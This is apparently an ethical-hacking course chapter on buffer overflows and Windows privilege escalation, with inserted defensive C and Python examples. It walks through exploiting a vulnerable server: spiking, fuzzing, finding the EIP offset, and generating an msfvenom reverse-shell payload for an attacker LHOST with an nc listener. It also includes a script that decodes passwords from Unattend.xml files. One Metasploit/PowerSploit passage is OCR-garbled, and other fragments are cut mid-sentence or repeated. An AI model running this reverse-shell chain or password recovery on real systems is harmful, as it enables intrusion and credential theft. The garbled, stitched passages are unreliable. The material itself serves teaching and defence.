A buffer is an area of adjacent memory locations allocated to a program or application to handle its runtime data. Buffer overflow or overrun is a common vulnerability in applications or programs that accept more data than the allocated buffer. This vulnerability allows the application to exceed the buffer while writing data to the buffer and overwrite neighboring memory locations. Furthermore, this vulnerability leads to erratic system behavior, system crash, memory access errors, etc. Attackers exploit a buffer overflow vulnerability to inject malicious code into the buffer to damage files, modify program data, access critical information, escalate privileges, gain shell access, and so on.

Why Are Programs and Applications Vulnerable to Buffer Overflows?

- Boundary checks are not performed fully, or, in most cases, entirely skipped
- Applications that use older versions of programming languages involve several vulnerabilities
- Programs that use unsafe and vulnerable functions fail to validate the buffer size
- Programs and applications that do not adhere to good programming practices
- Programmers that fail to set proper filtering and validation principles in the applications
- Systems that execute code present in the stack segment are vulnerable to buffer overflows
- Improper memory allocation and insufficient input sanitization in the application lead to buffer overflow attacks
- Application programs that use pointers for accessing heap memory result in buffer overflows
Types of Buffer Overflow

There are two types of buffer overflow, namely the stack-based buffer overflow and the heap-based buffer overflow.

Stack-Based Buffer Overflow

In most applications, a stack is used for static memory allocation. Contiguous blocks of memory are allocated for a stack to store temporary variables created by a function. The stack stores the variables in "Last-in First-out" (LIFO) order. Whenever a function is called, the memory required for storing the variables is declared on the stack, and when the function returns, the memory is automatically deallocated. There are two stack operations, namely, PUSH, which stores data onto the stack, and POP, which removes data from the stack.

Stack memory includes five types of registers:

- EBP: Extended Base Pointer (EBP), also known as Stack Base, stores the address of the first data element stored onto the stack
- ESP: Extended Stack Pointer (ESP) stores the address of the next data element to be stored onto the stack
- EIP: Extended Instruction Pointer (EIP) stores the address of the next instruction to be executed
- ESI: Extended Source Index (ESI) maintains the source index for various string operations
- EDI: Extended Destination Index (EDI) maintains the destination index for various string operations

A stack-based buffer overflow occurs when an application writes more data to a buffer than what is actually allocated for that buffer. To understand stack-based buffer overflow, you must focus on the EBP, EIP, and ESP registers. EIP is the most important read-only register, which stores the address of the instruction that needs to be subsequently executed.
Figure 6.37: Representation of stack (buffer space, EBP, EIP, return address)

Figure 6.38: Demonstration of stack-based buffer overflow (normal stack; stack when a function is called; stack when an attacker overflows the buffer in the function to smash the stack)
Heap-Based Buffer Overflow

A heap is used for dynamic memory allocation. Heap memory is dynamically allocated at run time during the execution of the program, and it stores the program data. Accessing heap memory is slower than accessing stack memory. The allocation and deallocation of heap memory is not performed automatically. Programmers must write code for the allocation [malloc()] of heap memory, and after the execution is complete, they must deallocate the memory using functions such as free().

Heap-based overflow occurs when a block of memory is allocated to a heap and data is written without any bound checking. This vulnerability leads to overwriting links to dynamic memory allocation (dynamic object pointers), heap headers, heap-based data, virtual function tables, etc. Attackers exploit heap-based buffer overflow to take control of the program's execution.

Buffer overflows commonly occur in the heap memory space, and exploitation of these bugs is different from that of stack-based buffer overflows. Heap overflows have been prominently discovered as software security bugs. Unlike stack overflows, heap overflows are inconsistent and have varying exploitation techniques.

Figure 6.39: Demonstration of heap-based buffer overflow
Buffer Overflow in Simple C

The examples shown in the screenshots demonstrate stack-based and heap-based buffer overflow:

Figure 6.40: Screenshot of C program demonstrating stack-based buffer overflow

Figure 6.41: Screenshot showing the output of stack-based buffer overflow

Figure 6.42: Screenshot of C program demonstrating heap-based buffer overflow

Figure 6.43: Screenshot showing the output of heap-based buffer overflow
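The C programs in the screenshots above are not reproduced in the text. The following added example, which is not the courseware's code, shows the same two defects in minimal form (an unbounded strcpy() into a fixed-size stack buffer, and an unbounded copy into a malloc()'d block) next to bounded versions that check the length first and refuse input that does not fit, instead of writing past the buffer into neighboring memory. The function names, the 64-byte buffer size and the sample inputs are this example's own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64   /* example's own choice of buffer size */

/* Stack-based defect: strcpy() copies until the source's terminating NUL,
 * so a source of 64 bytes or more runs past 'buf' into whatever the
 * compiler placed after it (saved frame pointer, return address).
 * Shown only for the pattern; the demo calls it with input that fits. */
int stack_copy_unbounded(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);                 /* no length check at all */
    return (int)strlen(buf);
}

/* Stack-based, hardened: measure first, reject input that cannot fit
 * together with its NUL, then copy exactly that many bytes.
 * Returns the copied length, or -1 when the input was rejected. */
int stack_copy_bounded(const char *src)
{
    char buf[BUF_SIZE];
    size_t n = strlen(src);
    if (n >= sizeof buf)
        return -1;                    /* would overflow: refuse, don't truncate silently */
    memcpy(buf, src, n + 1);          /* n bytes plus the terminating NUL */
    return (int)n;
}

/* Heap-based defect: same unbounded copy into a fixed heap block. The
 * overrun corrupts allocator metadata or the object allocated next. */
int heap_copy_unbounded(const char *src)
{
    char *block = malloc(BUF_SIZE);
    if (block == NULL)
        return -1;
    strcpy(block, src);
    int len = (int)strlen(block);
    free(block);
    return len;
}

/* Heap-based, hardened: enforce a caller-supplied maximum, then size the
 * block from the measured input. The max_len check also keeps n + 1 from
 * wrapping around. Returns the copied length, or -1 on rejection. */
int heap_copy_bounded(const char *src, size_t max_len)
{
    size_t n = strlen(src);
    if (n > max_len)
        return -1;
    char *block = malloc(n + 1);
    if (block == NULL)
        return -1;
    memcpy(block, src, n + 1);
    int len = (int)strlen(block);
    free(block);
    return len;
}

int main(void)
{
    /* constructed sample inputs */
    const char *fits = "short input";
    char too_long[200];
    memset(too_long, 'A', sizeof too_long - 1);
    too_long[sizeof too_long - 1] = '\0';

    printf("stack bounded, fits:     %d\n", stack_copy_bounded(fits));
    printf("stack bounded, too long: %d\n", stack_copy_bounded(too_long));
    printf("heap bounded, fits:      %d\n", heap_copy_bounded(fits, BUF_SIZE - 1));
    printf("heap bounded, too long:  %d\n", heap_copy_bounded(too_long, BUF_SIZE - 1));
    /* the unbounded variants are only ever called with input that fits */
    printf("stack unbounded, fits:   %d\n", stack_copy_unbounded(fits));
    printf("heap unbounded, fits:    %d\n", heap_copy_unbounded(fits));
    return 0;
}
```

The bounded versions reject rather than truncate on purpose: silently cutting a string can still change program meaning (a path, a command line), whereas a refused input is visible to the caller and can be logged.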
Windows Buffer Overflow Exploitation

Exploiting a Windows-based buffer overflow vulnerability involves the following steps:

- Perform spiking
- Perform fuzzing
- Identify the offset
- Overwrite the EIP register
- Identify bad characters
- Identify the right module
- Generate shellcode
- Gain root access

Before executing the following steps, you must install and run a vulnerable server on the victim's machine, then run Immunity Debugger, and finally attach the vulnerable server to the debugger.
Perform Spiking

Spiking allows attackers to send crafted TCP or UDP packets to the vulnerable server to make it crash. It helps attackers to identify buffer overflow vulnerabilities in the target application. The following steps are involved in spiking:

Step 1: Establish a connection with the vulnerable server

nc -nv <Target IP> <Target Port>

Figure 6.44: Screenshot of Netcat
Step 2: Generate spike template

Figure 6.45: Screenshot showing STATS spike template

Now, send the packages to the vulnerable server using the following command:

generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR SKIPSTR

Figure 6.46: Screenshot showing the output of spiking the vulnerable server
As we have identified that the STATS function is not vulnerable to buffer overflow, we next generate a spike template for the TRUN function.

Figure 6.47: Screenshot of Immunity Debugger

Figure 6.48: Screenshot showing TRUN spike template

Now, send the packages to the vulnerable server using the following command:

generic_send_tcp <Target IP> <Target Port> spike_script SKIPVAR SKIPSTR
As shown in the screenshot, the TRUN function of the vulnerable server has a buffer overflow vulnerability. Spiking this function overwrites stack registers such as EAX, ESP, EBP, and EIP. If attackers can overwrite the EIP register, they can gain shell access to the target system.

Figure 6.49: Screenshot showing the output of spiking the vulnerable server

Figure 6.50: Screenshot of Immunity Debugger showing buffer overflow vulnerability
Perform Fuzzing

After identifying the buffer overflow vulnerability in the target server, we must perform fuzzing. Attackers use fuzzing to send a large amount of data to the target server so that it experiences a buffer overflow and overwrites the EIP register. Fuzzing helps in identifying the number of bytes required to crash the target server. This information helps in determining the exact location of the EIP register, which further helps in injecting malicious shellcode.

For example, the screenshot below shows the sample Python script used by attackers to perform fuzzing:

Figure 6.51: Screenshot showing Python script for fuzzing

When you execute the above code, buff multiplies for every iteration of the while loop and the script sends the buff data to the vulnerable server. As shown in the screenshots, the vulnerable server crashed after receiving approximately 2300 bytes of data, but it did not overwrite the EIP register.

Figure 6.52: Screenshot of Immunity Debugger showing vulnerable server before buffer overflow

Figure 6.53: Screenshot showing the output of fuzzing the vulnerable server
Identify the Offset

Through fuzzing, we have understood that we can overwrite the EIP register with 1 to 2300 bytes of data. Now, we will use the following pattern_create Ruby tool to generate random bytes of data:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Figure 6.55: Screenshot showing Metasploit pattern_create output

Run the following Python script to send these random bytes to the vulnerable server:

Figure 6.57: Screenshot of Immunity Debugger showing vulnerable server after the buffer overflow
Run the following command to find the exact offset of the random bytes in the EIP register:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

Figure 6.58: Screenshot showing Metasploit pattern_offset output

Overwrite the EIP Register

As shown in the screenshot, we have identified that the EIP register is at an offset of 2003 bytes. Now, run the following Python script to check whether we can control the EIP register.

Figure 6.59: Screenshot of Python script injecting shellcode in the EIP register
As shown in the screenshot, the EIP register can be controlled and overwritten with malicious shellcode.

Identify Bad Characters

Before injecting the shellcode into the EIP register, you must first identify bad characters that may cause issues in the shellcode. You can obtain the badchars through a Google search. Characters such as the null byte, i.e., "\x00", are badchars.

The screenshot shows the badchars byte string used by the script, which runs through the byte values \x01 to \xff.
Figure 6.61: Screenshot of Python script for sending badchars

In Immunity Debugger, right-click on the ESP register value, then click on "Follow in Dump," and finally observe the characters. You will find that there are no badchars that create problems in the shellcode.
Identify the Right Module

modules. You must download mona.py from GitHub and copy it to the path Immunity Debugger > PyCommands. Now, run the vulnerable server and Immunity Debugger as Administrator, and attach the vulnerable server to the debugger.

In Immunity Debugger, type !mona modules in the bar at the bottom of the window. As shown in the screenshot, a pop-up window is created, which shows the protection settings of various modules.

Figure 6.63: Screenshot of Immunity Debugger showing mona modules

As shown in the screenshot, one of the modules, essfunc.dll, lacks memory protection. Attackers exploit such modules to inject shellcode and take full control of the EIP register.

Now, run the following nasm_shell Ruby script to convert assembly language (JMP ESP) into hex code:

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb

Figure 6.64: Screenshot showing Metasploit nasm_shell output

Next, in Immunity Debugger, type the following command in the bar at the bottom of the window to determine the return address of the vulnerable module:

!mona find -s "\xff\xe4" -m essfunc.dll
Figure 6.65: Screenshot of Immunity Debugger showing the return address of the vulnerable module

In Immunity Debugger, select "Enter expression" and enter the return address of the vulnerable module. For example, if the return address is "625011af", then you must send "\xaf\x11\x50\x62", as the x86 architecture stores values in the Little Endian format.
Figure 6.67: Screenshot of Python script for overwriting EIP

When you run the above script, you will notice that the EIP register has been overwritten with the return address of the vulnerable module:

Figure 6.68: Screenshot of Immunity Debugger showing EIP register

As shown in the screenshot, attackers can control the EIP register if the target server has modules that do not have proper memory protection settings.
Generate Shellcode and Gain Shell Access

Now, run the following msfvenom command to generate the shellcode:

msfvenom -p windows/shell_reverse_tcp LHOST=<IP address> LPORT=<port> EXITFUNC=thread -f c -a x86 -b "\x00"

In the above command, -p > payload, LHOST > attacker's IP, LPORT > attacker's port, -f > file type, -a > architecture, and -b > bad characters.

Figure 6.69: Screenshot showing the output of msfvenom
Now, run the following Python script to inject the generated shellcode into the EIP register and gain shell access to the target vulnerable server:

Figure 6.70: Screenshot of Python script for overwriting EIP

Before running the above script, run the following Netcat command to listen on port 4444:

nc -nvlp 4444

Figure 6.71: Screenshot of Netcat

Next, run the above Python script to gain shell access to the target vulnerable server:

Figure 6.72: Screenshot of Netcat showing remote shell access

Figure 6.73: Screenshot showing remote access to Admin account
Buffer Overflow Detection Tools

Various buffer overflow detection tools that help security professionals to detect buffer overflow vulnerabilities are discussed below:

OllyDbg

Source: http://www.ollydbg.de

OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft® Windows®. Its emphasis on binary code analysis makes it particularly useful when the source is unavailable. It debugs multithread applications and attaches to running programs. It recognizes complex code constructs, such as a call to jump to the procedure. It dynamically traces stack frames and program execution, and it logs arguments of known functions.

Figure 6.74: Screenshot of OllyDbg

Some additional buffer overflow detection tools are as follows:

- Veracode (https://www.veracode.com)
- Flawfinder (https://dwheeler.com)
- Kiuwan (https://www.kiuwan.com)
- Splint (https://github.com)
- BOVSTT (https://github.com)
Defending against Buffer Overflows

The following countermeasures can be adopted to defend against buffer overflow attacks:

- Develop programs by following secure coding practices and guidelines
- Use the address space layout randomization (ASLR) technique, which randomly moves around the address space locations of the data region
- Validate arguments and minimize code that requires root privileges
- Perform code review at the source-code level using static and dynamic code analyzers
- Allow the compiler to add bounds to all the buffers
- Implement automatic bound checking
- Always protect the return pointer on the stack
- Never allow execution of code outside the code space
- Regularly patch applications and operating systems
- Perform code inspection manually with a checklist to ensure that the code meets certain criteria
- Employ non-executable stacks, i.e., data execution prevention (DEP), which can mark the stack or memory regions as non-executable to prevent exploitation
- Implement code pointer integrity checking to detect whether a code pointer has been corrupted before it is dereferenced
- Scrutinize the code thoroughly to avoid possible errors by performing testing and debugging
- Perform automated and manual code auditing
- Avoid using unsafe functions; use strncat instead of strcat and strncpy instead of strcpy
- Use the NX bit to mark certain areas of memory as executable and non-executable
- Digitally sign the code before launching the program
- Ensure that all the control transfers are encompassed by a trusted and approved code image
- Adopt deep packet inspection (DPI) for detecting remote exploitation attempts at the network perimeter using attack signatures
- Consider altering the rules at the operating-system level where the memory pages can hold executable data
- Use IDS solutions to detect behavior that simulates an attack
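Two of the countermeasures above, protecting the return pointer on the stack and code pointer integrity checking, rest on one idea: keep a check value next to the pointer and verify it before the pointer is dereferenced. The following added example, which is not the courseware's code, shows that idea applied to a function pointer in user code. The pointer is stored together with a copy XORed with a secret key, and every call verifies that the two still agree, so a pointer overwritten by an overflow is refused rather than followed. The guarded_fn type, the fixed key and the sample handlers are this example's own construction; the return-address variant (stack canaries, pointer mangling) is emitted by the compiler and C library rather than written by hand.

```c
#include <stdint.h>
#include <stdio.h>

/* A code pointer plus a keyed copy. 'check' is the pointer XORed with a
 * per-process secret; an overflow that overwrites 'fn' with an arbitrary
 * address does not know the secret and so leaves 'check' mismatched. */
typedef void (*handler_t)(int *);

typedef struct {
    handler_t fn;
    uintptr_t check;
} guarded_fn;

/* Constructed secret. A real implementation draws this from a CSPRNG at
 * process start; a fixed value is used here only so the example is
 * deterministic and runs offline. */
static uintptr_t pointer_key(void)
{
    return (uintptr_t)0x5a17c3e9b2d4f681ULL;
}

/* Store the pointer and its keyed copy together. */
void guard_set(guarded_fn *g, handler_t fn)
{
    g->fn = fn;
    g->check = (uintptr_t)fn ^ pointer_key();
}

/* Returns 1 if the stored pointer still matches its keyed copy, else 0. */
int guard_verify(const guarded_fn *g)
{
    return ((uintptr_t)g->fn ^ pointer_key()) == g->check;
}

/* Dereference only after the integrity check. Returns 0 on success and -1
 * when the pointer no longer matches its copy (the call is refused). */
int guard_call(const guarded_fn *g, int *arg)
{
    if (!guard_verify(g))
        return -1;
    g->fn(arg);
    return 0;
}

/* Sample handlers (example's own). */
static void increment(int *v)    { *v += 1; }
static void never_called(int *v) { *v = -999; }

/* Intact pointer: the check passes and the handler runs. Returns 42. */
int demo_intact_call_succeeds(void)
{
    guarded_fn g;
    int value = 41;
    guard_set(&g, increment);
    if (guard_call(&g, &value) != 0)
        return -1;
    return value;
}

/* Simulates the effect of an overflow on the pointer: 'fn' is overwritten
 * directly, without the key, so 'check' is stale and the call is refused.
 * Returns -1 and leaves 'value' untouched. */
int demo_tampered_call_is_refused(void)
{
    guarded_fn g;
    int value = 0;
    guard_set(&g, increment);
    g.fn = never_called;              /* corruption: copy not updated */
    int rc = guard_call(&g, &value);
    return (rc == -1 && value == 0) ? -1 : 0;
}

int main(void)
{
    printf("intact call result:   %d\n", demo_intact_call_succeeds());
    printf("tampered call result: %d\n", demo_tampered_call_is_refused());
    return 0;
}
```

The check is cheap (one XOR and a compare per call) and catches the common case of a pointer overwritten by an adjacent overflow; it does not protect against an attacker who can also read the key, which is why real implementations keep the key out of the writable data the program handles.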
Module Flow

Escalating Privileges

Escalating privileges is the second stage of system hacking. Attackers use passwords obtained in the first step to gain access to the target system and then try to attain higher-level privileges in the system. The various tools and techniques attackers use to escalate their privileges are described as follows.
Privilege Escalation

Privileges are a security role assigned to users for using specific programs, features, OSs, functions, files or codes, etc., to limit their access by different types of users. If a user is assigned more privileges, he/she can modify or interact with more restricted parts of the system or application than less privileged users. Attackers initially gain system access with low privilege and then try to gain more privileges to perform activities restricted from less privileged users. A privilege escalation attack is the process of gaining more privileges than were initially acquired.

Figure 6.75: Example of privilege escalation

In a privilege escalation attack, attackers first gain access to the network using a non-admin user account and then try to gain administrative privileges. Attackers employ design flaws, programming errors, bugs, and configuration oversights in the OS and software application to gain administrative access to the network and its associated applications.
Once an attacker has gained access to a remote system with a valid username and password, he/she will attempt to escalate the user account to one with increased privileges, such as that of an administrator, to perform restricted operations. These privileges allow the attacker to view critical/sensitive information, delete files, or install malicious programs such as viruses, Trojans, worms, etc.

Types of Privilege Escalation

Privilege escalation is required when you want to access the system resources that you are not authorized to access. Privilege escalation takes place in two forms: vertical privilege escalation and horizontal privilege escalation.

- Horizontal Privilege Escalation: In a horizontal privilege escalation, the unauthorized user tries to access the resources, functions, and other privileges that belong to an authorized user who has similar access permissions. For instance, online banking user A can easily access user B's bank account.
- Vertical Privilege Escalation: In a vertical privilege escalation, the unauthorized user tries to gain access to the resources and functions of a user with higher privileges, such as application or site administrators. For example, someone using online banking can access the site using administrative functions.
Privilege Escalation Using DLL Hijacking

Most Windows applications do not use the fully qualified path when loading an external DLL library; instead, they first search the directory from which they have been loaded. Taking this as an advantage, if attackers can place a malicious DLL in the application directory, the application will execute the malicious DLL in place of the real DLL. For example, if an application "program.exe" needs library.dll (usually in the Windows system directory) to install the application, and fails to specify the library.dll path, Windows will search for the DLL in the directory from which the application was launched. If an attacker has already placed the DLL in the same directory as program.exe, then that malicious DLL will load instead of the real DLL, which allows the attacker to gain remote access to the target system.

Figure 6.76: Example of privilege escalation using DLL hijacking (application directory, user, real DLL required by the application, malicious DLL, Windows DLL library)
Attackers use tools such as Robber and PowerSploit to detect hijackable DLLs and perform DLL hijacking on the target system:

Robber

Source: https://github.com

Robber is an open-source tool that helps attackers to find executables prone to DLL hijacking. Attackers use Robber to find out which DLLs an executable requests without an absolute path (triggering this search process); attackers can then place their malicious DLL up the search path so that it gets invoked before the original DLL.

Figure 6.77: Screenshot of Robber showing injectable DLLs
Privilege Escalation by Exploiting Vulnerabilities

Vulnerability is the existence of a weakness, design flaw, or implementation error that can lead to an unexpected event compromising the security of the system. An attacker employs these vulnerabilities to perform various attacks on the confidentiality, availability, or integrity of a system. Software design flaws and programming errors lead to security vulnerabilities. Attackers exploit these software vulnerabilities, such as programming flaws in a program or service, or within the OS software or kernel, to execute malicious code. Exploiting software vulnerabilities allows attackers to execute a command or binary on a target machine to gain higher privileges than the existing ones or bypass security mechanisms. Attackers using these exploits can even access privileged user accounts and credentials.

There are many public vulnerability repositories available online that allow access to information about various software vulnerabilities. Attackers search for exploits that are based on the OS and software application on exploit sites such as SecurityFocus (https://www.securityfocus.com) or Exploit Database (https://www.exploit-db.com) and use these exploits to gain high privileges.

Figure 6.78: Screenshot of Exploit DB showing privilege escalation vulnerabilities
Privilege Escalation Using Dylib Hijacking

Similar to Windows, OS X is also vulnerable to dynamic library attacks. OS X provides several legitimate methods, such as setting the DYLD_INSERT_LIBRARIES environment variable, which are user specific. These methods force the loader to automatically load malicious libraries into a process.

Figure 6.79: Example of privilege escalation using Dylib hijacking

Dylib Hijack Scanner helps attackers to detect dylibs that are vulnerable to hijacking attacks. After identifying vulnerable dylibs, attackers use tools such as Dylib Hijack to perform dylib hijacking on the target system.
Privilege Escalation Using Spectre and Meltdown Vulnerabilities

Spectre and Meltdown are recent CPU vulnerabilities found in the design of modern processors, including chips from AMD, ARM, and Intel, caused by performance optimizations in these processors. Attackers may exploit these vulnerabilities to gain unauthorized access and steal critical system information such as login credentials, secret keys, keystrokes, encryption keys, etc. stored in the application's memory to escalate privileges. These attacks can be performed because the normal verification of the user's privileges is disrupted through the interaction of features like branch prediction, out-of-order execution, caching, and speculative execution. Using these vulnerabilities, attackers can exploit various IT resources, such as most OSs, servers, PCs, cloud systems, and mobile devices.

Spectre Vulnerability

The Spectre vulnerability is found in many modern processors, including Apple, AMD, ARM, Intel, Samsung, and Qualcomm processors. This vulnerability allows attackers to trick a processor into exploiting speculative execution to read restricted data. Modern processors implement speculative execution to predict the future to complete the execution faster. For example, if the chip identifies that a program includes multiple conditional statements, it will start executing and concluding all the possible outputs before the program does. Attackers may exploit this vulnerability in different ways:

- Attackers may use this feature to force the processor to take an improper speculative decision and further access data out of range
- Attackers may use this vulnerability to read adjacent memory locations of a process and access information for which they are not authorized. This vulnerability helps attackers to extract confidential information, such as credentials stored in the browser, from that target process. In certain cases, using this vulnerability, an attacker can even read the kernel memory or perform a web-based attack using JavaScript.

Meltdown Vulnerability

The Meltdown vulnerability is found in all Intel and ARM processors deployed by Apple. This vulnerability allows attackers to trick a process into accessing out-of-bounds memory by exploiting CPU optimization mechanisms such as speculative execution. For example, an attacker requests to access an illegal memory location. He/she sends a second request to read a valid memory location conditionally. In this case, a processor using speculative execution will complete evaluating the result for both requests before checking the first request. When the processor checks that the first request is invalid, it rejects both requests after checking the privileges. Even though the processor rejects both requests, the results of both requests remain in the cache memory. Now the attacker sends multiple valid requests to access out-of-bounds memory locations.

Attackers may use this vulnerability to escalate privileges by forcing an unprivileged process to read other adjacent memory locations, such as kernel memory and physical memory. This leads to critical system information such as credentials, private keys, etc. being revealed.
Privilege Escalation Using Named Pipe Impersonation

In Windows OS, named pipes are used to provide legitimate communication between running processes. In this technique, the messages are exchanged between the processes using a file. For example, if process A wants to send a message to another process B, then process A writes the message to a file and process B reads the message from that file. Attackers often exploit this technique to escalate their privileges on the victim system to a user account with higher privileges.

Figure 6.82: Screenshot of Metasploit showing dump of password hashes
Privilege Escalation by Exploiting Misconfigured Services

Attackers generally exploit zero-day vulnerabilities that exist in target systems to escalate privileges. If attackers are unable to find such exploits, they try to escalate privileges by abusing misconfigured services in the target OS. Insecure or improper configuration of system services allows attackers to elevate their privileges in the target system. For example, attackers exploit misconfigured services such as unquoted service paths, service object permissions, unattended installs, modifiable registry autoruns and configurations, etc. to elevate access privileges.
Attackers
use toolssuchas Metasploit
to obtainan active sessionwith the targethost.After
establishing to detectmisconfigured
an active session, attackersuse toolssuchas PowerSploit
servicesthat exist in thetargetOS.
roteter
Uploading > pal Power Uppal]
[Upload root PowerSplont/Privesc/Powerip.
7root/Powersploit/Privesc/PowerUp:ps1-->Powerlp-psT
Unquoted
683:Screenshot
Figure
ServicePaths
of Metasploit
showing
shell
access to thetargets ystem
In Windows OSs, when a service starts running, the system attempts to find the location of the executable file to launch the service successfully. Generally, the executable path is enclosed in quotation marks "", so that the system can easily locate the application binary. Some executable files may not include quoted paths and include whitespace in between; in this scenario, the system tries to find the application binary in the folders that exist in the path until the executable is found. Attackers exploit this by searching all services with unquoted paths running under SYSTEM privileges to elevate their privileges.

Figure 6.84: Screenshot of Metasploit showing execution of PowerSploit to detect unquoted service paths
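To see why an unquoted path with spaces is dangerous, the following added example (not from the courseware or from PowerSploit) computes the executables Windows would probe before reaching the intended binary, flags such services in a constructed registry-style listing, and produces the quoted ImagePath that fixes each one. The service names and paths are constructed sample data.

```python
from typing import Dict, List

# Constructed sample of service ImagePath values, as they would appear under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath (not taken from a real host).
SAMPLE_SERVICES: Dict[str, str] = {
    "BackupAgent": r"C:\Program Files\Acme Backup\agent.exe -service",
    "UpdaterSvc": r"C:\Program Files (x86)\Acme\Updater Service\updsvc.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "AcmeMonitor": r'"C:\Program Files\Acme Monitor\monitor.exe" --log',
}


def _is_exe(token: str) -> bool:
    return token.lower().endswith(".exe")


def hijack_candidates(image_path: str) -> List[str]:
    """Paths Windows would try before the intended binary of an unquoted ImagePath.

    CreateProcess splits an unquoted command line at spaces and, for each prefix
    without an extension, appends ".exe" and tries to run it. Every candidate that
    sits in a directory a low-privileged user can write to is a planting opportunity,
    since the service runs as SYSTEM. A quoted path, or a path without spaces,
    yields no candidates.
    """
    path = image_path.strip()
    if path.startswith('"') or " " not in path:
        return []
    tokens = path.split(" ")
    candidates: List[str] = []
    for i in range(1, len(tokens)):
        if _is_exe(tokens[i - 1]):
            break  # the prefix ending here is the intended executable; probing stops
        candidates.append(" ".join(tokens[:i]) + ".exe")
    return candidates


def quote_image_path(image_path: str) -> str:
    """Remediated ImagePath: the executable wrapped in quotes, arguments preserved."""
    path = image_path.strip()
    if path.startswith('"'):
        return path
    tokens = path.split(" ")
    for i, tok in enumerate(tokens):
        if _is_exe(tok):
            exe = " ".join(tokens[: i + 1])
            args = " ".join(tokens[i + 1:])
            return f'"{exe}"' + (f" {args}" if args else "")
    return f'"{path}"'  # no .exe token found: quote the whole string


def audit_unquoted_paths(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Return only the services whose ImagePath exposes hijack candidates."""
    return {name: hijack_candidates(p) for name, p in services.items() if hijack_candidates(p)}


if __name__ == "__main__":
    for name, cands in audit_unquoted_paths(SAMPLE_SERVICES).items():
        print(f"{name}: Windows probes {cands}")
        print(f"  fix: {quote_image_path(SAMPLE_SERVICES[name])}")
```

On a real host the same logic is applied to the ImagePath values read from the Services registry key, and each candidate's parent directory is then checked for write access by non-administrators.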
Service Object Permissions

A misconfigured service permission may allow an attacker to modify or reconfigure the attributes associated with that service. This may even lead to changing the location of the application binary to a malicious executable created by the attacker. By exploiting such services, attackers can even add new users to the local administrator group in the system. Attackers then hijack the new account to elevate their access privileges.
Figure 6.85: Screenshot of Metasploit showing execution of PowerSploit to detect misconfigured service permissions

Unattended Installs
In Windows systems, the Unattend.xml file is stored in one of the following locations:

C:\Windows\Panther\
C:\Windows\Panther\Unattend\
C:\Windows\system32\
C:\Windows\system32\sysprep\

If attackers can gain access to this file, then they can easily obtain credential information and configuration settings used during the installation of that service or application. Attackers use this information to escalate privileges.
Figure 6.86: Screenshot of Metasploit showing execution of PowerSploit to detect unattended install
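The following added example (not from the courseware) shows what a defender checks in a leftover answer file: it parses a constructed Unattend.xml, reports every password element as cleared, plaintext, or merely "encoded", and recovers the encoded value, since Windows stores a non-plaintext unattend password as base64 of the UTF-16LE password with the element name appended, which is not encryption. The account names and passwords are constructed sample data.

```python
import base64
import os
import xml.etree.ElementTree as ET
from typing import Dict, List

# The four locations named above; a defender checks each for leftover files.
UNATTEND_LOCATIONS = [
    r"C:\Windows\Panther\Unattend.xml",
    r"C:\Windows\Panther\Unattend\Unattend.xml",
    r"C:\Windows\system32\Unattend.xml",
    r"C:\Windows\system32\sysprep\Unattend.xml",
]

CLEARED_MARKER = "*SENSITIVE*DATA*DELETED*"  # what sysprep writes when it scrubs a value

# Constructed sample answer file (not from a real host). The "encoded" value is
# how Windows stores a non-plaintext password: base64(UTF-16LE(password + tag)).
ENCODED_ADMIN_PW = base64.b64encode(
    "Summer2020AdministratorPassword".encode("utf-16-le")).decode()

SAMPLE_UNATTEND = f"""<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>P@ssw0rd!</Value><PlainText>true</PlainText></Password>
        <Enabled>true</Enabled><Username>svc_deploy</Username>
      </AutoLogon>
      <UserAccounts>
        <AdministratorPassword>
          <Value>{ENCODED_ADMIN_PW}</Value><PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts><LocalAccount>
          <Password><Value>{CLEARED_MARKER}</Value><PlainText>true</PlainText></Password>
          <Name>helpdesk</Name>
        </LocalAccount></LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>"""


def local_name(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def decode_unattend_password(value: str, element: str) -> str:
    """Reverse the unattend 'encoding': base64 -> UTF-16LE -> drop the element-name tag."""
    text = base64.b64decode(value).decode("utf-16-le")
    tag = "AdministratorPassword" if element == "AdministratorPassword" else "Password"
    return text[:-len(tag)] if text.endswith(tag) else text


def audit_unattend(xml_text: str) -> List[Dict[str, str]]:
    """Report every password element: cleared, plaintext, or encoded (recoverable)."""
    findings: List[Dict[str, str]] = []
    for elem in ET.fromstring(xml_text).iter():
        name = local_name(elem.tag)
        if name not in ("Password", "AdministratorPassword"):
            continue
        value, plaintext = (elem.text or "").strip(), True
        for child in elem:
            if local_name(child.tag) == "Value":
                value = (child.text or "").strip()
            elif local_name(child.tag) == "PlainText":
                plaintext = (child.text or "").strip().lower() == "true"
        if value in ("", CLEARED_MARKER):
            state, password = "cleared", ""
        elif plaintext:
            state, password = "plaintext", value
        else:
            state, password = "encoded", decode_unattend_password(value, name)
        findings.append({"element": name, "state": state, "password": password})
    return findings


def scan_known_locations() -> Dict[str, List[Dict[str, str]]]:
    """On a Windows host, audit whichever of the known locations still exist."""
    results: Dict[str, List[Dict[str, str]]] = {}
    for path in UNATTEND_LOCATIONS:
        if os.path.isfile(path):
            with open(path, encoding="utf-8-sig") as fh:
                results[path] = audit_unattend(fh.read())
    return results


if __name__ == "__main__":
    for finding in audit_unattend(SAMPLE_UNATTEND):
        print(finding)
```

Any finding whose state is not "cleared" means the file should be deleted or scrubbed as part of post-deployment hardening.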
Pivoting and Relaying to Hack External Machines

Relaying example: after setting up port forwarding rules, attackers can browse the HTTP server running on the target system using the URL http://localhost:10080, and then access the system's resources through the forwarded ports.
Pivoting and Relaying to Hack External Machines

